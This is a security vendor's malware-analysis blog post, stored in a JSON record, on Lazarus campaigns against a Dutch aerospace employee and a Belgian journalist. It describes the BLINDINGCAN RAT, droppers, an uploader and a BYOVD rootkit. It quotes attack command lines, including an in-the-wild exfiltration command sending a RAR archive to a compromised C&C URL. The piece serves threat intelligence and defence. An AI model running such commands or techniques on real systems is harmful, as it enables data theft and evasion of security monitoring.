{
	"id": "6eb7ca48-a54c-4b37-9dc1-fd4473c6ca14",
	"created_at": "2026-04-06T00:15:27.654317Z",
	"updated_at": "2026-04-10T03:38:20.124602Z",
	"deleted_at": null,
	"sha1_hash": "4b8619effdbc24352c4c1a3d88459d130f2109bd",
	"title": "Amazon-themed campaigns of Lazarus in the Netherlands and Belgium",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2715642,
	"plain_text": "Amazon-themed campaigns of Lazarus in the Netherlands and Belgium\r\nBy Peter Kálnai\r\nArchived: 2026-04-05 12:47:46 UTC\r\nESET researchers uncovered and analyzed a set of malicious tools that were used by the infamous Lazarus APT group in\r\nattacks during the autumn of 2021. The campaign started with spearphishing emails containing malicious Amazon-themed\r\ndocuments and targeted an employee of an aerospace company in the Netherlands, and a political journalist in Belgium. The\r\nprimary goal of the attackers was data exfiltration. Lazarus (also known as HIDDEN COBRA) has been active since at least\r\n2009. It is responsible for high-profile incidents such as both the Sony Pictures Entertainment hack and tens-of-millions-of-dollar cyberheists in 2016, the WannaCryptor (aka WannaCry) outbreak in 2017, and a long history of disruptive attacks\r\nagainst South Korean public and critical infrastructure since at least 2011.\r\nKey findings in this blogpost:\r\nThe Lazarus campaign targeted an employee of an aerospace company in the Netherlands, and a political journalist in\r\nBelgium.\r\nThe most notable tool used in this campaign represents the first recorded abuse of the CVE‑2021‑21551 vulnerability.\r\nThis vulnerability affects Dell DBUtil drivers; Dell provided a security update in May 2021.\r\nThis tool, in combination with the vulnerability, disables the monitoring of all security solutions on compromised\r\nmachines. It uses techniques against Windows kernel mechanisms that have never been observed in malware before.\r\nLazarus also used in this campaign their fully featured HTTP(S) backdoor known as BLINDINGCAN.\r\nThe complexity of the attack indicates that Lazarus consists of a large team that is systematically organized and well\r\nprepared.\r\nBoth targets were presented with job offers – the employee in the Netherlands received an attachment via LinkedIn\r\nMessaging, and the person in Belgium received a document via email. 
Attacks started after these documents were opened.\r\nThe attackers deployed several malicious tools on each system, including droppers, loaders, fully featured HTTP(S)\r\nbackdoors, HTTP(S) uploaders and downloaders. The commonality between the droppers was that they are trojanized open-source projects that decrypt the embedded payload using modern block ciphers with long keys passed as command line\r\narguments. In many cases, malicious files are DLL components that were side-loaded by legitimate EXEs, but from an\r\nunusual location in the file system.\r\nThe most notable tool delivered by the attackers was a user-mode module that gained the ability to read and write kernel\r\nmemory due to the CVE-2021-21551 vulnerability in a legitimate Dell driver. This is the first ever recorded abuse of this\r\nvulnerability in the wild. The attackers then used their kernel memory write access to disable seven mechanisms the\r\nWindows operating system offers to monitor its actions, like registry, file system, process creation, event tracing etc.,\r\nbasically blinding security solutions in a very generic and robust way.\r\nIn this blogpost, we explain the context of the campaign and provide a detailed technical analysis of all the components.\r\nThis research was presented at this year’s Virus Bulletin conference. Because of the originality, the main focus of the\r\npresentation is on the malicious component used in this attack that uses the Bring Your Own Vulnerable Driver (BYOVD)\r\ntechnique and leverages the aforementioned CVE-2021-21551 vulnerability. 
Detailed information is available in the white\r\npaper Lazarus \u0026 BYOVD: Evil to the Windows core.\r\nWe attribute these attacks to Lazarus with high confidence, based on the specific modules, the code-signing certificate, and\r\nthe intrusion approach in common with previous Lazarus campaigns like Operation In(ter)ception and Operation DreamJob.\r\nThe diversity, number, and eccentricity in implementation of Lazarus campaigns define this group, as well as that it\r\nperforms all three pillars of cybercriminal activities: cyberespionage, cybersabotage, and pursuit of financial gain.\r\nInitial access\r\nESET researchers discovered two new attacks: one against personnel of a media outlet in Belgium and one against an\r\nemployee of an aerospace company in the Netherlands.\r\nIn the Netherlands, the attack affected a Windows 10 computer connected to the corporate network, where an employee was\r\ncontacted via LinkedIn Messaging about a supposed potential new job, resulting in an email with a document attachment\r\nbeing sent. We contacted the security practitioner of the affected company, who was able to share the malicious document\r\nwith us. The Word file Amzon_Netherlands.docx sent to the target is merely an outline document with an Amazon logo (see\r\nFigure 1). When opened, the remote template\r\nhttps://thetalkingcanvas[.]com/thetalking/globalcareers/us/5/careers/jobinfo.php?image=\u003cvar\u003e_DO.PROJ (where \u003cvar\u003e is a\r\nseven-digit number) is fetched. We were unable to acquire the content, but we assume that it may have contained a job offer\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 1 of 13\n\nfor the Amazon space program, Project Kuiper. This is a method that Lazarus practiced in the Operation In(ter)ception and\r\nOperation DreamJob campaigns targeting aerospace and defense industries.\r\nFigure 1. 
Amazon-themed document sent to the target in the Netherlands\r\nWithin hours, several malicious tools were delivered to the system, including droppers, loaders, fully featured HTTP(S)\r\nbackdoors, HTTP(S) uploaders and HTTP(S) downloaders; see the Toolset section.\r\nRegarding the attack in Belgium, the employee of a journalism company (whose email address was publicly available on the\r\ncompany’s website) was contacted via an email message with the lure AWS_EMEA_Legal_.docx attached. Since we didn’t\r\nobtain the document, we know only its name, which suggests it might have been making a job offer in a legal position. After\r\nopening the document, the attack was triggered, but stopped by ESET products immediately, with just one malicious\r\nexecutable involved. The interesting aspect here is that, at that time, this binary was validly signed with a code-signing\r\ncertificate.\r\nAttribution\r\nWe attribute both attacks to the Lazarus group with a high level of confidence. This is based on the following factors, which\r\nshow relationships to other Lazarus campaigns:\r\n1. Malware (the intrusion set):\r\n1. The HTTPS backdoor (SHA‑1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2) has strong\r\nsimilarities with the BLINDINGCAN backdoor, reported by CISA (US-CERT), and attributed to HIDDEN\r\nCOBRA, which is their codename for Lazarus.\r\n2. The HTTP(S) uploader has strong similarities with the tool C:\\ProgramData\\IBM\\~DF234.TMP mentioned in\r\nthe report by HvS Consulting, Section 2.10 Exfiltration.\r\n3. The full file path and name, %ALLUSERSPROFILE%\\Adobe\\Adobe.tmp, is identical to the one reported by\r\nKaspersky in February 2021 in a white paper about Lazarus’s Operation ThreatNeedle, which targets the\r\ndefense industry.\r\n4. 
The code-signing certificate, which was issued to the US company \"A\" MEDICAL OFFICE, PLLC and used\r\nto sign one of the droppers, was also reported in the campaign against security researchers; see also Lazarus\r\ngroup: 2 TOY GUYS campaign, ESET Threat report 2021 T1, Page 11.\r\n5. An unusual type of encryption was leveraged in the tools of this Lazarus campaign: HC-128. Other less\r\nprevalent ciphers used by Lazarus in the past: a Spritz variant of RC4 in the watering hole attacks against\r\nPolish and Mexican banks; later Lazarus used a modified RC4 in Operation In(ter)ception; a modified A5/1\r\nstream cipher was used in the WIZVERA VeraPort supply-chain attack.\r\n2. Infrastructure:\r\n1. For the first-level C\u0026C server, the attackers do not use their own servers, but hack existing ones instead. This\r\nis a typical, yet weak-confidence behavior of Lazarus.\r\nOne of the typical traits of Lazarus is its delivery of the final payload in the form of a sequence of two or three stages. It\r\nstarts with a dropper – usually a trojanized open-source application – that decrypts the embedded payload with a modern\r\nblock cipher like AES-128 (which is not unusual for Lazarus, e.g., Operation Bookcodes) or an obfuscated XOR, after\r\nparsing the command line arguments for a strong key. Despite the embedded payload not being dropped onto the file system\r\nbut loaded directly into memory and executed, we denote such malware as a dropper. Malware that doesn’t have an\r\nencrypted buffer, but that loads a payload from a filesystem, we denote as a loader.\r\nThe droppers may (Table 1) or may not (Table 2) be side-loaded by a legitimate (Microsoft) process. In the first case here,\r\nthe legitimate application is at an unusual location and the malicious component bears the name of the corresponding DLL\r\nthat is among the application’s imports. 
For example, the malicious DLL colorui.dll is side-loaded by a legitimate system\r\napplication Color Control Panel (colorcpl.exe), both located at C:\\ProgramData\\PTC\\. However, the usual location for this\r\nlegitimate application is %WINDOWS%\\System32\\.\r\nIn all cases, at least one command line argument is passed during runtime that serves as an external parameter required to\r\ndecrypt the embedded payload. Various decryption algorithms are used; see the last column in Table 1 and Table 2. In\r\nseveral cases when AES-128 is used, there’s also an internal, hardcoded parameter together with the name of the parent\r\nprocess and its DLL name, all required for successful decryption.\r\nTable 1. Malicious DLLs side-loaded by a legitimate process from an unusual location\r\nLocation folder\r\nLegitimate\r\nparent process\r\nMalicious\r\nside-loaded\r\nDLL\r\nTrojanized project External parameter\r\nC:\\ProgramData\\PTC\\ colorcpl.exe colorui.dll\r\nlibcrypto of LibreSSL\r\n2.6.5\r\nBE93E050D9C0EAEB1F0E6A\r\n(Loads BLINDINGCAN)\r\nC:\\Windows\\Vss\\ WFS.exe credui.dll\r\nGOnpp v1.2.0.0\r\n(Notepad++ plug‑in)\r\nA39T8kcfkXymmAcq\r\n(Loads the intermediate loader)\r\nC:\\Windows\\security\\ WFS.exe credui.dll\r\nFingerText 0.56.1\r\n(Notepad++ plug‑in)\r\nN/A\r\nC:\\ProgramData\\Caphyon\\ wsmprovhost.exe mi.dll lecui 1.0.0 alpha 10 N/A\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ SMSvcHost.exe cryptsp.dll lecui 1.0.0 alpha 10 N/A\r\nTable 2. 
Other malware involved in the attack\r\nLocation folder Malware\r\nTrojanized\r\nproject\r\nExternal parameter\r\nDecryption\r\nalgorithm\r\nC:\\PublicCache\\ msdxm.ocx libpcre 8.44\r\n93E41C6E20911B9B36BC\r\n(Loads the HTTP(S) downloader)\r\nXOR\r\nC:\\ProgramData\\Adobe\\ Adobe.tmp\r\nSQLite\r\n3.31.1\r\nS0RMM‑50QQE‑F65DN‑DCPYN‑5QEQA\r\n(Loads the HTTP(S) updater)\r\nXOR\r\nC:\\PublicCache\\ msdxm.ocx sslSniffer Missing HC-128\r\nAfter successful decryption, the buffer is checked for the proper PE format and execution is passed to it. This procedure can\r\nbe found in most of the droppers and loaders. The beginning of it can be seen in Figure 2.\r\nFigure 2. The decrypted buffer is a 64-bit executable\r\nHTTP(S) backdoor: BLINDINGCAN\r\nWe identified a fully featured HTTP(S) backdoor – a RAT known as BLINDINGCAN – used in the attack.\r\nThis payload’s dropper was executed as %ALLUSERSPROFILE%\\PTC\\colorui.dll; see Table 1 for details. The payload is\r\nextracted and decrypted using a simple XOR but with a long key, which is a string built by concatenating the name of the\r\nparent process, its own filename, and the external command line parameter – here\r\nCOLORCPL.EXECOLORUI.DLLBE93E050D9C0EAEB1F0E6AE13C1595B5.\r\nThe payload, SHA-1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2, is a 64-bit VMProtect-ed DLL. A connection\r\nis made to one of the remote locations https://aquaprographix[.]com/patterns/Map/maps.php or https://turnscor[.]com/wp-includes/feedback.php. Within the virtualized code we pivoted via the following very specific RTTI artifacts found in the\r\nexecutable: .?AVCHTTP_Protocol@@, .?AVCFileRW@@. Moreover, there’s a similarity on the code level, as the indices\r\nof the commands start with the same value, 8201; see Figure 3. 
This helped us to identify this RAT as BLINDINGCAN\r\n(SHA-1: 5F4FBD57319BD0D2DF31131E864FDDA9590A652D), reported for the first time by CISA. The recent version\r\nof this payload was observed in another Amazon-themed campaign, where BLINDINGCAN was dropped by a trojanized\r\nPutty-0.77 client: see Mandiant’s blog.\r\nFigure 3. Code comparison of plain (upper, unprotected) and virtualized (lower, VMProtect-ed) variants of BLINDINGCAN,\r\nwith an agreement of two command indices, 8256 and 8201\r\nBased on the number of command codes that are available to the operator, it is likely that a server-side controller is available\r\nwhere the operator can control and explore compromised systems. Actions made within this controller probably result in the\r\ncorresponding command IDs and their parameters being sent to the RAT running on the target’s system. The list of\r\ncommand codes is in Table 3 and agrees with the analysis done by JPCERT/CC, Appendix C. There are no validation checks\r\nof parameters like folder or filenames. That means all the checks have to be implemented on the server side, which suggests\r\nthat the server-side controller is a complex application, very likely with a user-friendly GUI.\r\nTable 3. 
The RAT’s commands\r\nCommand Description\r\n8201 Send system information like computer name, Windows version, and the code page.\r\n8208 Get the attributes of all files in mapped RDP folders (\\\\tsclient\\C etc.).\r\n8209 Recursively get the attributes of local files.\r\n8210 Execute a command in the console, store the output to a temporary file, and upload it.\r\n8211 Zip files in a temporary folder and upload them.\r\n8212 Download a file and update its time information.\r\n8214 Create a new process in the console and collect the output.\r\n8215\r\nCreate a new process in the security context of the user represented by the specified token and collect the\r\noutput.\r\n8217 Recursively create a process tree list.\r\n8224 Terminate a process.\r\n8225 Delete a file securely.\r\n8226\r\nEnable nonblocking I/O via TCP socket (socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) with\r\nthe FIONBIO control code).\r\n8227 Set the current directory for the current process.\r\n8231 Update the time information of the selected file.\r\n8241 Send the current configuration to the C\u0026C server.\r\n8242 Update the configuration.\r\n8243 Recursively list the directory structure.\r\n8244 Get type and free disk space of a drive.\r\n8249 Continue with the next command.\r\n8256 Request another command from the C\u0026C server.\r\n8262 Rewrite a file without changing its last write time.\r\n8264 Copy a file to another destination.\r\n8265 Move a file to another destination.\r\n8272 Delete a file.\r\n8278 Take a screenshot.\r\nIntermediate loader\r\nNow we describe a three-stage chain where, unfortunately, we were able to identify only the first two steps: a dropper and an\r\nintermediate loader.\r\nThe first stage is a dropper located at C:\\Windows\\Vss\\credui.dll and was run via a legitimate – but vulnerable to DLL\r\nsearch-order hijacking – 
application with the (external) parameter C:\\Windows\\Vss\\WFS.exe A39T8kcfkXymmAcq. The\r\nprogram WFS.exe is a copy of the Windows Fax and Scan application, but its standard location is\r\n%WINDOWS%\\System32\\.\r\nThe dropper is a trojanized GOnpp plug-in for Notepad++, written in the Go programming language. After the decryption,\r\nthe dropper checks whether the buffer is a valid 64-bit executable and then, if so, loads it into memory, so that the second\r\nstage is ready for execution.\r\nThe goal of this intermediate stage is to load an additional payload in memory and execute it. It performs this task in two\r\nsteps. It first reads and decrypts the configuration file C:\\windows\\System32\\wlansvc.cpl, which is not, as its extension\r\nmight suggest, an (encrypted) executable, but a data file containing chunks of 14944 bytes with configuration. We didn’t\r\nhave the particular data from the current attack; however, we obtained such configuration from another Lazarus attack: see\r\nFigure 5. The configuration is expected to start with a double word representing the total size of the remaining buffer (see\r\nLine 69 in Figure 4 below and the variable u32TotalSize), followed by an array of 14944 byte-long structures containing at\r\nleast two values: the name of the loading DLL as a placeholder for identifying the rest of the configuration (at the offset 168\r\nof Line 74 in Figure 4 and the highlighted member in Figure 5).\r\nFigure 4. The first step of decrypting the configuration file and checking if the name of the loading DLL matches the\r\nexpected one\r\nThe second step is the action of reading, decrypting, and loading this file that represents very likely the third and final stage.\r\nIt is expected to be a 64-bit executable and is loaded into the memory the same way the first-stage dropper handled the\r\nintermediate loader. 
At the start of execution, a mutex is created as a concatenation of the string\r\nGlobal\\AppCompatCacheObject and the CRC32 checksum of its DLL name (credui.dll) represented as a signed integer. The\r\nvalue should equal Global\\AppCompatCacheObject-1387282152 if wlansvc.cpl exists and -1387282152 otherwise.\r\nFigure 5. A configuration of the intermediate loader. The highlighted file name is expected to match with the name of the\r\nrunning malware; see also Figure 4.\r\nAn interesting fact is the use of this decryption algorithm (Figure 4, Line 43 \u0026 68), which is not that prevalent either in the\r\nLazarus toolset or in malware in general. The constants 0xB7E15163 and 0x61C88647 (which is -0x9E3779B9; see Figure 6,\r\nLine 29 \u0026 35) in the key expansion suggest that it’s either the RC5 or RC6 algorithm. By checking the main decryption\r\nloop of the algorithm, one identifies that it’s the more complex of the two, RC6. An example of a sophisticated threat using\r\nsuch uncommon encryption is Equation Group’s BananaUsurper; see Kaspersky’s report from 2016.\r\nFigure 6. Key expansion of RC6\r\nHTTP(S) downloader\r\nA downloader using the HTTP(S) protocols was delivered onto the target’s system as well.\r\nIt was installed by a first stage dropper (SHA1: 001386CBBC258C3FCC64145C74212A024EAA6657), which is a\r\ntrojanized libpcre-8.44 library. It was executed by the command\r\ncmd.exe /c start /b rundll32.exe C:\\PublicCache\\msdxm.ocx,sCtrl 93E41C6E20911B9B36BC\r\n(the parameter is an XOR key for extracting the embedded payload; see Table 2). 
The dropper also achieves persistence by\r\ncreating the OneNoteTray.LNK file located in the %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup folder.\r\nThe second stage is a 32-bit VMProtect-ed module that makes an HTTP connection request to a C\u0026C server stored in its\r\nconfiguration; see Figure 7. It uses the same User Agent – Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95\r\nSafari/537.36 – as BLINDINGCAN RAT, contains the RTTI artifact .?AVCHTTP_Protocol@@ but not .?AVCFileRW@@,\r\nand lacks features like taking screenshots, archiving files, or executing a command via the command line. It is able to load\r\nan executable to a newly allocated memory block and pass code execution to it.\r\nFigure 7. A configuration of the HTTP(S) downloader. The highlighted values are the size of the configuration and the\r\nnumber of URLs. In the attack we observed, all the URLs were identical.\r\nHTTP(S) uploader\r\nThis Lazarus tool is responsible for data exfiltration, by using the HTTP or HTTPS protocols.\r\nIt is delivered in two stages as well. The initial dropper is a trojanized sqlite-3.31.1 library. Lazarus samples usually don’t\r\ncontain a PDB path, but this loader has one, W:\\Develop\\Tool\\HttpUploader\\HttpPOST\\Pro\\_BIN\\RUNDLL\\64\\sqlite3.pdb,\r\nwhich also immediately suggests its functionality – an HTTP uploader.\r\nThe dropper expects multiple command line parameters: one of them is a password required to decrypt and load the\r\nembedded payload; the rest of the parameters are passed to the payload. 
We didn’t catch the parameters, but luckily an in-the-wild use of this tool was observed in a forensic investigation by HvS Consulting:\r\nC:\\ProgramData\\IBM\\~DF234.TMP S0RMM-50QQE-F65DN-DCPYN-5QEQA\r\nhttps://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp C:\\ProgramData\\IBM\\restore0031.dat data03 10000 -p\r\n192.168.1.240 8080\r\nThe first parameter, S0RMM-50QQE-F65DN-DCPYN-5QEQA, worked as a key for the decryption routine of the dropper\r\n(to be more precise, an obfuscation was performed first, where the encrypted buffer was XOR-ed with its copy shifted by\r\none byte; then an XOR decryption with the key followed). The rest of the parameters are stored in a structure and passed to\r\nthe second stage. For the explanation of their meanings, see Table 4.\r\nTable 4. Command line parameters for the HTTP(S) updater\r\nParameter Value Explanation\r\n1 S0RMM-50QQE-F65DN-DCPYN-5QEQA A 29-byte decryption key.\r\n2 https://\u003c...\u003e C\u0026C for data exfiltration.\r\n3 C:\\ProgramData\\IBM\\restore0031.dat The name of a local RAR volume.\r\n4 data03 The name of the archive on the server side.\r\n5 10,000 The size of a RAR split (max 200,000 kB).\r\n6 N/A Starting index of a split.\r\n7 N/A Ending index of a split.\r\n8 -p A switch -p\r\n9 192.168.1.240 Proxy IP address\r\n10 8080 Proxy Port\r\nThe second stage is the HTTP uploader itself. The only parameter for this stage is a structure containing the C\u0026C server for\r\nthe exfiltration, the filename of a local RAR archive, the root name of a RAR archive on the server-side, the total size of a\r\nRAR split in kilobytes, an optional range of split indices, and an optional -p switch with the internal proxy IP and a port; see\r\nTable 4. 
For example, if the RAR archive is split into 88 chunks, each 10,000 kB large, then the uploader would submit\r\nthese splits and store them on the server side under names data03.000000.avi, data03.000001.avi, …, data03.000087.avi.\r\nSee Figure 8, Line 42 where these strings are formatted.\r\nThe User-Agent is the same as for BLINDINGCAN and the HTTP(S) downloader, Mozilla/5.0 (Windows NT 6.1;\r\nWOW64) Chrome/28.0.1500.95 Safari/537.36.\r\nFigure 8. The exfiltration of RAR splits to a C\u0026C server\r\nFudModule Rootkit\r\nWe identified a dynamically linked library with the internal name FudModule.dll that tries to disable various Windows\r\nmonitoring features. It does so by modifying kernel variables and removing kernel callbacks, which is possible because the\r\nmodule acquires the ability to write in the kernel by leveraging the BYOVD technique, specifically the CVE-2021-21551\r\nvulnerability in the Dell driver dbutil_2_3.sys.\r\nThe full analysis of this malware is available as a VB2022 paper Lazarus \u0026 BYOVD: evil to the Windows core.\r\nOther malware\r\nAdditional droppers and loaders were discovered in the attacks, but we didn’t obtain the necessary parameters to decrypt the\r\nembedded payloads or encrypted files.\r\nTrojanized lecui\r\nA project lecui by Alec Musafa served the attackers as a code base for trojanization of two additional loaders. By their\r\nfilenames, they were disguised as Microsoft libraries mi.dll (Management Infrastructure) and cryptsp.dll (Cryptographic\r\nService Provider API), respectively, and this was due to the intended side-loading by the legitimate applications\r\nwsmprovhost.exe and SMSvcHost.exe, respectively; see Table 1.\r\nThe main purpose of these loaders is to read and decrypt executables located in alternate data streams (ADS) at\r\nC:\\ProgramData\\Caphyon\\mi.dll:Zone.Identifier and C:\\Program Files\\Windows Media\r\nPlayer\\Skins\\DarkMode.wmz:Zone.Identifier, respectively. 
Since we haven’t acquired these files, it’s not known which\r\npayload is hidden there; however, the only certainty is that it’s an executable, since the loading process follows the\r\ndecryption (see Figure 2). The use of ADS is not new: Ahnlab reported a Lazarus attack against South Korean\r\ncompanies in June 2021 involving such techniques.\r\nTrojanized FingerText\r\nESET blocked an additional trojanized open-source application, FingerText 0.5.61 by erinata, located at\r\n%WINDIR%\\security\\credui.dll. The correct command line parameters are not known. As in some of the previous cases,\r\nthree parameters were required for the AES-128 decryption of the embedded payload: the parent process’s name, WFS.exe;\r\nthe internal parameter, mg89h7MsC5Da4ANi; and the missing external parameter.\r\nTrojanized sslSniffer\r\nThe attack against a target in Belgium was blocked early in its deployment chain so only one file was identified, a 32-bit\r\ndropper located at C:\\PublicCache\\msdxm.ocx. It is an sslSniffer component from the wolfSSL project that has been\r\ntrojanized. At the time of the attack, it was validly signed with a certificate issued to \"A\" MEDICAL OFFICE, PLLC (see\r\nFigure 8), which has since expired.\r\nFigure 9. Validly signed but already expired certificate\r\nIt has two malicious exports that the legitimate DLL doesn’t have: SetOfficeCertInit and SetOfficeCert. Both exports require\r\nexactly two parameters. 
The purpose of the first export is to establish persistence by creating OfficeSync.LNK, located in\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup, pointing to the malicious DLL and running its second\r\nexport via rundll32.exe with the parameters passed to itself.\r\nThe second export, SetOfficeCert, uses the first parameter as a key to decrypt the embedded payload, but we couldn’t extract\r\nit, because the key is not known to us.\r\nThe decryption algorithm is also interesting, as the attackers use HC-128 with the first parameter as the 128-bit key and\r\nthe string ffffffffffffffff as its 128-bit initialization vector. The constants revealing the cipher are displayed in Figure 10.\r\nFigure 10. The key setup with highlighted constants suggesting the HC-128 cipher\r\nConclusion\r\nIn this attack, as well as in many others attributed to Lazarus, we saw that many tools were distributed even on a single\r\ntargeted endpoint in a network of interest. Without a doubt, the team behind the attack is quite large, systematically\r\norganized, and well prepared. For the first time in the wild, the attackers were able to leverage CVE-2021-21551 for turning\r\noff the monitoring of all security solutions. It was not just done in kernel space, but also in a robust way, using a series of\r\nlittle- or undocumented Windows internals. Undoubtedly this required deep research, development, and testing skills.\r\nFrom the defenders’ point of view, it seems easier to limit the possibilities of initial access than to block the robust toolset\r\nthat would be installed after determined attackers gain a foothold in the system. As in many cases in the past, an employee\r\nfalling prey to the attackers’ lure was the initial point of failure here. 
In sensitive networks, companies should insist that\r\nemployees not pursue their personal agendas, like job hunting, on devices belonging to their company’s infrastructure.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research now also offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the\r\nESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of Indicators of Compromise and samples can be found in our GitHub repository.\r\nNetwork\r\nIP Provider First seen Details\r\n67.225.140[.]4 Liquid Web, L.L.C 2021‑10‑12\r\nA compromised legitimate WordPress-based site hosting\r\nthe C\u0026C server\r\nhttps://turnscor[.]com/wp-includes/feedback.php\r\n50.192.28[.]29\r\nComcast Cable\r\nCommunications, LLC\r\n2021‑10‑12\r\nA compromised legitimate site hosting the C\u0026C server\r\nhttps://aquaprographix[.]com/patterns/Map/maps.php\r\n31.11.32[.]79 Aruba S.p.A. 2021‑10‑15\r\nA compromised legitimate site hosting the C\u0026C server\r\nhttp://www.stracarrara[.]org/images/img.asp\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 11 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nExecution\r\nT1106 Native API\r\nThe Lazarus HTTP(S) backdoor uses the Windows API\r\nto create new processes.\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nHTTP(S) backdoor malware uses cmd.exe to execute\r\ncommand-line tools\r\nDefense\r\nEvasion\r\nT1140\r\nDeobfuscate/Decode Files\r\nor Information\r\nMany of the Lazarus tools are stored in an encrypted\r\nstate on the file system.\r\nT1070.006\r\nIndicator Removal on\r\nHost: Timestomp\r\nThe Lazarus HTTP(S) backdoor can modify the file time\r\nattributes of a selected file.\r\nT1574.002\r\nHijack Execution\r\nFlow: DLL Side-Loading\r\nMany of the Lazarus droppers and loaders use a\r\nlegitimate program for their loading.\r\nT1014 Rootkit\r\nThe user-to-kernel module of Lazarus can turn off\r\nmonitoring features of the OS.\r\nT1027.002\r\nObfuscated Files or\r\nInformation: Software\r\nPacking\r\nLazarus uses Themida and VMProtect to obfuscate their\r\nbinaries\r\nT1218.011\r\nSystem Binary 
Proxy\r\nExecution: Rundll32\r\nLazarus uses rundll32.exe to execute its malicious DLLs\r\nCommand\r\nand Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nThe Lazarus HTTP(S) backdoor uses HTTP and HTTPS\r\nto communicate with its C\u0026C servers.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric Cryptography\r\nThe Lazarus HTTP(S) backdoor encrypts C\u0026C traffic\r\nusing the AES-128 algorithm.\r\nT1132.001\r\nData Encoding: Standard\r\nEncoding\r\nThe Lazarus HTTP(S) payloads encode C\u0026C traffic\r\nusing the base64 algorithm.\r\nExfiltration T1560.002\r\nArchive Collected Data:\r\nArchive via Library\r\nThe Lazarus HTTP(S) uploader can zip files of interest\r\nand upload them to its C\u0026C.\r\nResource\r\nDevelopment\r\nT1584.004\r\nAcquire\r\nInfrastructure: Server\r\nCompromised servers were used by all the Lazarus\r\nHTTP(S) backdoor, uploader, and downloader as a C\u0026C.\r\nDevelop\r\nCapabilities\r\nT1587.001 Malware\r\nCustom tools from the attack are likely developed by the\r\nattackers. 
Some exhibit highly specific kernel\r\ndevelopment capacities seen earlier in Lazarus tools.\r\nExecution T1204.002\r\nUser Execution:\r\nMalicious File\r\nThe target was lured to open a malicious Word\r\ndocument.\r\nInitial Access\r\nT1566.003\r\nPhishing: Spearphishing\r\nvia Service\r\nThe target was contacted via LinkedIn Messaging.\r\nT1566.001\r\nPhishing: Spearphishing\r\nAttachment\r\nThe target received a malicious attachment.\r\nPersistence\r\nT1547.006\r\nBoot or Logon Autostart\r\nExecution: Kernel\r\nModules and Extensions\r\nThe BYOVD DBUtils_2_3.sys was installed to start via\r\nthe Boot loader (value 0x00 in the Start key under\r\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\\u003cname\u003e.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 11 of 13\n\nTactic ID Name Description\r\nT1547.001\r\nBoot or Logon Autostart\r\nExecution: Startup Folder\r\nThe dropper of the HTTP(S) downloader creates a LNK\r\nfile OneNoteTray.LNK in the Startup folder.\r\nReferences\r\nAhnlab. Analysis Report on Lazarus Group’s Rootkit Attack Using BYOVD. Vers. 1.0. 22 September 2022. Retrieved from\r\nAhnLab Security Emergency Response Center.\r\nAhnlab. (2021, June 4). APT Attacks on Domestic Companies Using Library Files. Retrieved from AhnLab Security\r\nEmergency Response Center.\r\nAhnlab. (2022, September 22). Analysis Report on Lazarus Group’s Rootkit Attack Using BYOVD. Retrieved from AhnLab\r\nSecurity Emergency Response Center.\r\nBreitenbacher, D., \u0026 Kaspars, O. (2020, June). Operation In(ter)ception: Aerospace and military companies in the crosshairs\r\nof cyberspies. Retrieved from WeLiveSecurity.com.\r\nClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign.\r\nRetrieved from ClearSky.com.\r\nDekel, K. (n.d.). Sentinel Labs Security Research. 
CVE-2021-21551- Hundreds Of Millions Of Dell Computers At Risk Due\r\nto Multiple BIOS Driver Privilege Escalation Flaws. Retrieved from SentinelOne.com.\r\nESET. (2021, June 3). ESET Threat Report T 1 2021. Retrieved from WeLiveSecurity.com.\r\nGReAT. (2016, August 16). The Equation giveaway. Retrieved from SecureList.com.\r\nHvS-Consulting AG. (2020, December 15). Greetings from Lazarus: Anatomy of a cyber-espionage campaign. Retrieved\r\nfrom hvs-consulting.de.\r\nCherepanov, A., \u0026 Kálnai, P. (2020, November). Lazarus supply-chain attack in South Korea. Retrieved\r\nfrom WeLiveSecurity.com.\r\nKálnai, P. (2017, 2 17). Demystifying targeted malware used against Polish banks. (ESET) Retrieved from\r\nWeLiveSecurity.com.\r\nKopeytsev, V., \u0026 Park, S. (2021, February). Lazarus targets defense industry with ThreatNeedle. (Kaspersky Lab) Retrieved\r\nfrom SecureList.com.\r\nLee, T.-w., Dong-wook, \u0026 Kim, B.-j. (2021). Operation BookCode - Targeting South Korea. Virus Bulletin. localhost.\r\nRetrieved from vblocalhost.com.\r\nMaclachlan, J., Potaczek, M., Isakovic, N., Williams, M., \u0026 Gupta, Y. (2022, September 14). It's Time to PuTTY! DPRK\r\nJob Opportunity Phishing via WhatsApp. Retrieved from Mandiant.com.\r\nTomonaga, S. (2020, September 29). BLINDINGCAN - Malware Used by Lazarus. (JPCERT/CC) Retrieved from\r\nblogs.jpcert.or.jp.\r\nUS-CERT CISA. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN.\r\n(CISA) Retrieved from cisa.gov.\r\nWeidemann, A. (2021, 1 25). New campaign targeting security researchers. (Google Threat Analysis Group) Retrieved from\r\nblog.google.\r\nWu, H. (2008). The Stream Cipher HC-128. In M. Robshaw , \u0026 O. Billet , New Stream Cipher Designs (Vol. 4986). Berlin,\r\nHeidelberg: Springer. 
